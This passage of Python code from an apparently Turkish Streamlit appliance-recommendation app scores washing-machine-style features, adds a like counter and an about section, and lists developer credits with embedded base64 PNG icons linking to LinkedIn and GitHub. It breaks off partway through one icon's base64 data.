data2_b['energy_usage'][i] == "Çok önemli": data4_b['energy_usage'][i] = 3 elif data2_b['energy_usage'][i] == "Önemli": data4_b['energy_usage'][i] = 2 else: data4_b['energy_usage'][i] = 1 for i in range(len(data2_b['wifi'])): if data2_b['wifi'][i] == "VAR": data4_b['wifi'][i] = 2 else: data4_b['wifi'][i] = 1 for i in range(len(data2_b['control_panel'])): if data2_b['control_panel'][i] == "VAR": data4_b['control_panel'][i] = 2 else: data4_b['control_panel'][i] = 1 for i in range(len(data2_b['box'])): if data2_b['box'][i] == "Çekmeceli": data4_b['box'][i] = 2 else: data4_b['box'][i] = 1 for i in range(len(data2_b['number_of_program'])): if data2_b['number_of_program'][i] == "9+": data4_b['number_of_program'][i] = 3 elif data2_b['number_of_program'][i] == "5-8 Program": data4_b['number_of_program'][i] = 2 else: data4_b['number_of_program'][i] = 1 for i in range(len(data2_b['water_consumption'])): if data2_b['water_consumption'][i] == "Düşük Tüketim": data4_b['water_consumption'][i] = 3 elif data2_b['water_consumption'][i] == "Orta Tüketim": data4_b['water_consumption'][i] = 2 else: data4_b['water_consumption'][i] = 1 puan = 0 data4_b["puan"] = "" for k in range(len(data2_b['full_name'])): for j in data4_b.drop(["full_name","price","image","puan"],axis=1).columns: if j != "water_consumption": puan = puan + data4_b[j][k] else: puan = puan + data4_b[j][k] data4_b["puan"][k] = puan puan = 0 dataf_b["puan"] = data4_b["puan"] dataf_b["puan"] = dataf_b.puan.astype(int) dataf_b["price"] = dataf_b.price.astype(float) if dil_secenek == "TR": if machine ==" ": col1, col2, col3, col4, col5,col6,col7,col8,col9,col10,col11,col12 = st.columns([1,1,1,1,1,1,1,1,1,1,1,5]) with col12: if dil_secenek == "TR": button = st.button("Beğen 👍") if button: st.write("Teşekkür ederiz 💗") file1 = open("counter.txt","r") count = file1.read() count_int = count.replace("'","") count_int = int(count_int) + 1 with open('counter.txt', 'w') as f: f.write(str(count_int)) st.title("Proje hakkında") st.markdown("<b><i>Tüketici Ürün Rehberi </i></b>, beyaz eşya ihtiyacı bulunan tüketicilerin, kendileri için en iyi ürünü seçmesine yardım etmeyi amaçlayan bir Python projesidir.", unsafe_allow_html=True) st.markdown("İnsanlar, etkileşimde bulundukları e-ticaret web sitelerinin, kim olduklarını ve neyle ilgilendiklerini hatırlamalarını ve önceki etkinliklerine dayalı olarak yeni içerik ve ürünler ile kendi ihtiyaçlarına uygun önerilerde bulunulmasını bekler. Bu talepleri karşılayamayan herhangi bir uygulama veya web sitesi, kullanıcılarının hızla azaldığını görecektir.") st.markdown("Tüketici Ürün Rehberi, belirli bir kullanıcının ihtiyaçlarına göre satın almak istediği eşyalar için öneriler oluşturmak amacı ile tasarlanmış bir yazılım aracıdır.") st.markdown(" ") st.title("Proje Geliştiricileri") st.markdown(" ") col1, col2, col3, col4, col5,col6,col7 = st.columns([1,1,1,1,1,1,1]) with col1: st.markdown("<b><i>Mert Türkyılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/mertturkyilmaz/)") st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/mertturkyilmaz)") with col4: st.markdown("<b><i>Sarper Yılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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